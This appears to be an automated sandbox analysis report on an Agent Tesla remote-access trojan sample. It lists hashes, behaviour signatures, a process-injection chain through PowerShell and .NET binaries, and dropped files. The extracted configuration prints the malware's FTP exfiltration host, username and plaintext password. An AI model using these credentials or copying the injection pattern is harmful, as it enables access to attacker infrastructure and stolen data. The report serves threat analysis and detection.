Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    18/05/2024, 18:33

General

  • Target

    file.exe

  • Size

    1.0MB

  • MD5

    dc8a137a9917260473120aa235f69f5f

  • SHA1

    dd74caccc6c2ab38da7f4171d1a64ae506f185b8

  • SHA256

    e47140a389037bf3c66528b2a762dd359b3d2da361f324819b18ca595d2f178e

  • SHA512

    de49ba1a489a488fa15262869f49944a3a46f1d2b2a1fc1e55b7e9914b92d892b5e22bc0230a7e8b7dd072f11753d7d683c4d49cb993d85eff23a92acdc61c19

  • SSDEEP

    12288:MUfbdTxwbed/QIA8EmCCZPyXNDxaMejIQv7iglCqRoeuIIymiR8gZMRnObwZNtV:MUfhTFQBeCHND/j87j8oIhiR8gv69

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.tekserendustriyel.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    chuzy2024@

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -EncodedCommand [base64-encoded command blob omitted]
      2⤵
      • Suspicious use of SetThreadContext
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4968
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        3⤵
        PID:4988
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        3⤵
        PID:4576
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:2252
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        PID:1436

Network

MITRE ATT&CK Enterprise v15

Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2gt4l4m3.vov.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\file-2966.putik

                Filesize

                33KB

                MD5

                3c14b9bc33ce5f0b10b4275a6eaa8357

                SHA1

                32aaab855271823146dd5ae040869b7d3396fe52

                SHA256

                a43e0362fee162598f177bc18013b4cd3861ac166ad1af06b460663a55a2cb35

                SHA512

                f9f9d6f7d2717e49d892e69b67f9ff211ac1d4bee5182297bf39d0a064841a86b15423ac31e6528c2b629354cff5d7dd55739ba1c869b3a60d771da1834377a1

              • memory/2252-21-0x0000000074F60000-0x0000000075710000-memory.dmp

                Filesize

                7.7MB

              • memory/2252-24-0x00000000064B0000-0x0000000006542000-memory.dmp

                Filesize

                584KB

              • memory/2252-27-0x0000000074F60000-0x0000000075710000-memory.dmp

                Filesize

                7.7MB

              • memory/2252-26-0x0000000074F6E000-0x0000000074F6F000-memory.dmp

                Filesize

                4KB

              • memory/2252-25-0x0000000006640000-0x000000000664A000-memory.dmp

                Filesize

                40KB

              • memory/2252-23-0x00000000063C0000-0x0000000006410000-memory.dmp

                Filesize

                320KB

              • memory/2252-17-0x0000000000400000-0x0000000000440000-memory.dmp

                Filesize

                256KB

              • memory/2252-18-0x0000000074F6E000-0x0000000074F6F000-memory.dmp

                Filesize

                4KB

              • memory/2252-19-0x0000000005470000-0x0000000005A14000-memory.dmp

                Filesize

                5.6MB

              • memory/2252-20-0x0000000004FC0000-0x0000000005026000-memory.dmp

                Filesize

                408KB

              • memory/4968-1-0x00007FFBF2453000-0x00007FFBF2455000-memory.dmp

                Filesize

                8KB

              • memory/4968-22-0x00007FFBF2450000-0x00007FFBF2F11000-memory.dmp

                Filesize

                10.8MB

              • memory/4968-16-0x00000181450B0000-0x0000018145144000-memory.dmp

                Filesize

                592KB

              • memory/4968-12-0x00007FFBF2450000-0x00007FFBF2F11000-memory.dmp

                Filesize

                10.8MB

              • memory/4968-15-0x000001812C000000-0x000001812C00C000-memory.dmp

                Filesize

                48KB

              • memory/4968-3-0x00000181442A0000-0x00000181442C2000-memory.dmp

                Filesize

                136KB

              • memory/4968-13-0x00007FFBF2450000-0x00007FFBF2F11000-memory.dmp

                Filesize

                10.8MB